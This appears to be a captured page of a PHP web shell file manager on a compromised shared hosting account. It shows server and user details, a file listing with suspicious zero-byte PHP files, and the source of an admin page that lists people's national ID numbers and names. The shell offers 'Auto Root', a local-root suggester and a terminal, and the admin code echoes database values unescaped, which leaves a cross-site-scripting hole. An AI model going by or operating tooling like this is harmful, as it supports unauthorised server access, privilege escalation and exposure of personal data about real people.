Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.9
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
julaysp1 /
public_html /
js /
dist /
Delete
Unzip
Name
Size
Permission
Date
Action
img
[ DIR ]
drwxr-xr-x
2025-09-14 00:12
js
[ DIR ]
drwxr-xr-x
2025-09-13 23:17
pwstabs
[ DIR ]
drwxr-xr-x
2025-09-14 00:57
wp
[ DIR ]
drwxr-xr-x
2025-09-13 22:32
37julay_space.zip
2.9
MB
-rw-r--r--
2025-08-27 07:31
TonnyBanglaMJ-Regular.ttf
69.59
KB
-rw-r--r--
2025-05-27 07:33
all_list.php
2.1
KB
-rw-r--r--
2024-10-25 15:16
bpbluyix.php
0
B
-rw-r--r--
2025-09-13 18:11
cardTokenName-20250913201821-20250914011208.txt
8
B
-rw-r--r--
2025-05-29 16:31
cardTokenName-20250913201821.txt
8
B
-rw-r--r--
2025-05-29 16:31
config.php
392
B
-rw-r--r--
2024-12-04 06:50
generate_token.php
1.12
KB
-rw-r--r--
2024-11-06 08:08
htaccess-20250913202320.txt
120
B
-rw-r--r--
2025-08-21 08:56
htaccess.txt
120
B
-rw-r--r--
2025-08-21 08:56
index.php
7.03
KB
-rw-r--r--
2025-09-10 08:54
smartRate-20250914002644.txt
2
B
-rw-r--r--
2025-08-20 19:12
smartRate.txt
2
B
-rw-r--r--
2025-08-20 19:12
wp-blog-header.php
0
B
-rw-r--r--
2025-09-13 14:51
wp-cron.php
0
B
-rw-r--r--
2025-09-13 16:20
Save
Rename
<link rel="stylesheet" href="assets/vendors/datatables.net-bs4/datatable.css"> <?php include_once("header.php"); if($email != "ahmedniloy@gmail.com"){ header("location: dashboard.php"); exit(); } ?> <div class="row"> <div class="col-md-12"> <div class="card mb-4"> <?php include 'includes/marquee.php'; $id =2; $marquee = new Marquee($conn, $id); $marquee->display(); ?> </div> </div> <div class="container my-5 overflow-auto"> <table id="myTable" class="table table-striped table-hover"> <thead> <tr> <th>#</th> <th>user</th> <th>Number</th> <th>Name</th> <th>Time</th> </tr> </thead> <tbody> <?php $user = $_SESSION["user_token"]; $sql = "SELECT * from log ORDER BY `log`.`id` DESC"; $result = $conn->query($sql); $cnt = 1; if ($result->num_rows > 0) { // output data of each row while($row = $result->fetch_assoc()) { $id = $row["id"]; $nid = $row["nid"]; $user = $row["user"]; $name = $row["name"]; $create_at = $row["create_at"]; ?> <tr> <td><?php echo $cnt;?></td> <td><?php echo $user;?></td> <td><?php echo $nid;?></td> <td><?php echo $name;?></td> <td><?php echo $create_at;?></td> </tr> <?php $cnt = $cnt + 1; } } ?> </tbody> </table> </div> <?php include_once("footer.php");?> <script src="https://cdn.datatables.net/1.13.4/js/jquery.dataTables.min.js"></script> <script> $(document).ready(function () { $('#myTable').DataTable({ "info": false, "ordering": false, "language": { "search": '<i class="fa-solid fa-magnifying-glass"></i>', 'searchPlaceholder': "search here..." } }); }); </script>